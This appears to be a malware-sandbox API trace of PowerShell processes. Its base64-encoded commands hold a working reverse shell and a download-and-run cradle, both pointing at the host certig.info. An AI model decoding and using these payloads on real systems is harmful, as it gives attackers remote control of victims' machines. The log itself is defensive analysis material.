	[0195.846] lstrlenW (lpString="IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHAAQgBVAGMAUQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAG0AQwBBAGIAPQAoACQAcABCAFUAYwBRAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABVAFEAQwBWAEkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJAB2AHIASwBPAEcAPQAkAGQAbQBDAEEAYgAuAFIAZQBhAGQAKAAkAFUAUQBDAFYASQAsADAALAAkAFUAUQBDAFYASQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAHcARQBsAHYASwA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAVQBRAEMAVgBJACwAMAAsACQAdgByAEsATwBHACkAOwAkAFcASABzAEIAeAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAdwBFAGwAdgBLACAAMgA+ACYAMQApACkAOwAkAGQAbQBDAEEAYgAuAFcAcgBpAHQAZQAoACQAVwBIAHMAQgB4ACwAMAAsACQAVwBIAHMAQgB4AC4ATABlAG4AZwB0AGgAKQA7ACQAZABtAEMAQQBiAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABwAEIAVQBjAFEALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcABCAFUAYwBRAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==") returned 1736
	[0195.846] RtlMoveMemory (in: Destination=0x631588, Source=0x53e0b42, Length=0xd92 | out: Destination=0x631588) 
	[0195.847] LocalFree (hMem=0x53e0b10) returned 0x0
	[0195.848] GetConsoleTitleW (in: lpConsoleTitle=0x631588, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0195.848] GetLastError () returned 0x0
	[0195.852] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHAAQgBVAGMAUQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAG0AQwBBAGIAPQAoACQAcABCAFUAYwBRAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABVAFEAQwBWAEkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJAB2AHIASwBPAEcAPQAkAGQAbQBDAEEAYgAuAFIAZQBhAGQAKAAkAFUAUQBDAFYASQAsADAALAAkAFUAUQBDAFYASQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAHcARQBsAHYASwA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAVQBRAEMAVgBJACwAMAAsACQAdgByAEsATwBHACkAOwAkAFcASABzAEIAeAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAdwBFAGwAdgBLACAAMgA+ACYAMQApACkAOwAkAGQAbQBDAEEAYgAuAFcAcgBpAHQAZQAoACQAVwBIAHMAQgB4ACwAMAAsACQAVwBIAHMAQgB4AC4ATABlAG4AZwB0AGgAKQA7ACQAZABtAEMAQQBiAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABwAEIAVQBjAFEALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcABCAFUAYwBRAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x628eb8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2b6a660 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHAAQgBVAGMAUQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAG0AQwBBAGIAPQAoACQAcABCAFUAYwBRAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABVAFEAQwBWAEkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJAB2AHIASwBPAEcAPQAkAGQAbQBDAEEAYgAuAFIAZQBhAGQAKAAkAFUAUQBDAFYASQAsADAALAAkAFUAUQBDAFYASQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAHcARQBsAHYASwA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAVQBRAEMAVgBJACwAMAAsACQAdgByAEsATwBHACkAOwAkAFcASABzAEIAeAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAdwBFAGwAdgBLACAAMgA+ACYAMQApACkAOwAkAGQAbQBDAEEAYgAuAFcAcgBpAHQAZQAoACQAVwBIAHMAQgB4ACwAMAAsACQAVwBIAHMAQgB4AC4ATABlAG4AZwB0AGgAKQA7ACQAZABtAEMAQQBiAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABwAEIAVQBjAFEALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcABCAFUAYwBRAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", lpProcessInformation=0x2b6a660*(hProcess=0x6d8, hThread=0x6d4, dwProcessId=0x904, dwThreadId=0xbec)) returned 1
	[0195.858] GetLastError () returned 0x0
	[0195.860] CloseHandle (hObject=0x6d4) returned 1
	[0195.860] GetLastError () returned 0x0
	[0195.860] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x628ea0, cbFileInfo=0x160, uFlags=0x2000 | out: psfi=0x628ea0) returned 0x4550
	[0195.861] GetCurrentProcess () returned 0xffffffff
	[0195.861] GetLastError () returned 0x0
	[0195.861] GetCurrentProcess () returned 0xffffffff
	[0195.861] GetLastError () returned 0x0
	[0195.862] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x6d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f6edac, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f6edac*=0x6d4) returned 1
	[0195.862] GetLastError () returned 0x0

Thread:
	id = 216
	os_tid = 0xb98


Thread:
	id = 220
	os_tid = 0x834

	[0189.913] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0189.915] ResetEvent (hEvent=0x398) returned 1
	[0189.916] GetLastError () returned 0x0

Thread:
	id = 222
	os_tid = 0xa90


Thread:
	id = 225
	os_tid = 0xb70


Thread:
	id = 348
	os_tid = 0xd88


Process:
	id = "7"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3e895000"
	os_pid = "0x808"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x998"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 94
	os_tid = 0x838

	[0091.508] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0092.122] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0092.122] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0092.122] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0092.122] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0092.978] GetVersionExW (in: lpVersionInformation=0xedde0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedde0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0092.980] GetVersionExW (in: lpVersionInformation=0xedde0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedde0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0092.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0092.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xedaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0092.995] GetVersionExW (in: lpVersionInformation=0xedb50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedb50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0092.996] SetErrorMode (uMode=0x1) returned 0x1
	[0092.997] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xedcb0 | out: lpFileInformation=0xedcb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0092.998] SetErrorMode (uMode=0x1) returned 0x1
	[0093.002] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xedf20 | out: lpdwHandle=0xedf20) returned 0x94c
	[0093.004] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bf71d0 | out: lpData=0x2bf71d0) returned 1
	[0093.006] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xede98, puLen=0xede90 | out: lplpBuffer=0xede98*=0x2bf726c, puLen=0xede90) returned 1
	[0093.024] lstrlenW (lpString="䅁") returned 1
	[0093.034] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xede08, puLen=0xede00 | out: lplpBuffer=0xede08*=0x2bf7348, puLen=0xede00) returned 1
	[0093.035] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0093.037] CoTaskMemAlloc (cb=0x2e) returned 0x2783c0
	[0093.037] lstrcpyW (in: lpString1=0x2783c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0093.038] CoTaskMemFree (pv=0x2783c0) 
	[0093.038] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xede08, puLen=0xede00 | out: lplpBuffer=0xede08*=0x2bf739c, puLen=0xede00) returned 1
	[0093.038] lstrlenW (lpString="System.Management.Automation") returned 28
	[0093.038] CoTaskMemAlloc (cb=0x3c) returned 0x2776c0
	[0093.038] lstrcpyW (in: lpString1=0x2776c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0093.038] CoTaskMemFree (pv=0x2776c0) 
	[0093.039] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xede08, puLen=0xede00 | out: lplpBuffer=0xede08*=0x2bf73f8, puLen=0xede00) returned 1
	[0093.039] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0093.039] CoTaskMemAlloc (cb=0x20) returned 0x27f390
	[0093.039] lstrcpyW (in: lpString1=0x27f390, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0093.039] CoTaskMemFree (pv=0x27f390) 
	[0093.039] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xede08, puLen=0xede00 | out: lplpBuffer=0xede08*=0x2bf7438, puLen=0xede00) returned 1
	[0093.039] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0093.039] CoTaskMemAlloc (cb=0x44) returned 0x2776c0
	[0093.039] lstrcpyW (in: lpString1=0x2776c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0093.039] CoTaskMemFree (pv=0x2776c0) 
	[0093.039] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xede08, puLen=0xede00 | out: lplpBuffer=0xede08*=0x2bf74a0, puLen=0xede00) returned 1
	[0093.039] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0093.039] CoTaskMemAlloc (cb=0x76) returned 0x21b230
	[0093.039] lstrcpyW (in: lpString1=0x21b230, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0093.039] CoTaskMemFree (pv=0x21b230) 
	[0093.039] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xede08, puLen=0xede00 | out: lplpBuffer=0xede08*=0x2bf753c, puLen=0xede00) returned 1
	[0093.039] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0093.039] CoTaskMemAlloc (cb=0x44) returned 0x2776c0
	[0093.039] lstrcpyW (in: lpString1=0x2776c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0093.039] CoTaskMemFree (pv=0x2776c0) 
	[0093.039] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xede08, puLen=0xede00 | out: lplpBuffer=0xede08*=0x2bf75a0, puLen=0xede00) returned 1
	[0093.039] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0093.039] CoTaskMemAlloc (cb=0x58) returned 0x1f3990
	[0093.039] lstrcpyW (in: lpString1=0x1f3990, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0093.039] CoTaskMemFree (pv=0x1f3990) 
	[0093.040] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xede08, puLen=0xede00 | out: lplpBuffer=0xede08*=0x2bf761c, puLen=0xede00) returned 1
	[0093.040] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0093.040] CoTaskMemAlloc (cb=0x20) returned 0x27f390
	[0093.040] lstrcpyW (in: lpString1=0x27f390, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0093.040] CoTaskMemFree (pv=0x27f390) 
	[0093.040] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xede08, puLen=0xede00 | out: lplpBuffer=0xede08*=0x2bf72c4, puLen=0xede00) returned 1
	[0093.040] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0093.040] CoTaskMemAlloc (cb=0x66) returned 0x1f4980
	[0093.040] lstrcpyW (in: lpString1=0x1f4980, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0093.040] CoTaskMemFree (pv=0x1f4980) 
	[0093.040] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xede08, puLen=0xede00 | out: lplpBuffer=0xede08*=0x0, puLen=0xede00) returned 0
	[0093.040] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xede08, puLen=0xede00 | out: lplpBuffer=0xede08*=0x0, puLen=0xede00) returned 0
	[0093.040] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xede08, puLen=0xede00 | out: lplpBuffer=0xede08*=0x0, puLen=0xede00) returned 0
	[0093.040] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xeddd8, puLen=0xeddd0 | out: lplpBuffer=0xeddd8*=0x2bf726c, puLen=0xeddd0) returned 1
	[0093.041] CoTaskMemAlloc (cb=0x204) returned 0x22b9f0
	[0093.041] VerLanguageNameW (in: wLang=0x0, szLang=0x22b9f0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0093.042] CoTaskMemFree (pv=0x22b9f0) 
	[0093.042] VerQueryValueW (in: pBlock=0x2bf71d0, lpSubBlock="\\", lplpBuffer=0xede28, puLen=0xede20 | out: lplpBuffer=0xede28*=0x2bf71f8, puLen=0xede20) returned 1
	[0093.049] GetCurrentProcessId () returned 0x808
	[0093.069] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xecd50 | out: lpLuid=0xecd50*(LowPart=0x14, HighPart=0)) returned 1
	[0093.072] GetCurrentProcess () returned 0xffffffffffffffff
	[0093.073] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xecd70 | out: TokenHandle=0xecd70*=0x2ec) returned 1
	[0093.074] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2bfaa48*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0093.076] CloseHandle (hObject=0x2ec) returned 1
	[0093.080] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x808) returned 0x2ec
	[0093.091] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2bfaab0, cb=0x200, lpcbNeeded=0xedd88 | out: lphModule=0x2bfaab0, lpcbNeeded=0xedd88) returned 1
	[0093.094] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f600000, lpmodinfo=0x2bfad20, cb=0x18 | out: lpmodinfo=0x2bfad20*(lpBaseOfDll=0x13f600000, SizeOfImage=0x77000, EntryPoint=0x13f60c63c)) returned 1
	[0093.095] CoTaskMemAlloc (cb=0x804) returned 0x281310
	[0093.095] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f600000, lpBaseName=0x281310, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0093.095] CoTaskMemFree (pv=0x281310) 
	[0093.096] CoTaskMemAlloc (cb=0x804) returned 0x281310
	[0093.096] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f600000, lpFilename=0x281310, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0093.096] CoTaskMemFree (pv=0x281310) 
	[0093.097] CloseHandle (hObject=0x2ec) returned 1
	[0093.108] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x808) returned 0x2ec
	[0093.109] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0xedeb8 | out: lpExitCode=0xedeb8*=0x103) returned 1
	[0093.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bfb088, Length=0x20000, ResultLength=0xede80 | out: SystemInformation=0x12bfb088, ResultLength=0xede80*=0x126b8) returned 0x0
	[0093.134] EnumWindows (lpEnumFunc=0x29e66ac, lParam=0x0) returned 1
	[0093.135] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.136] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.136] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.136] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.136] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.136] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
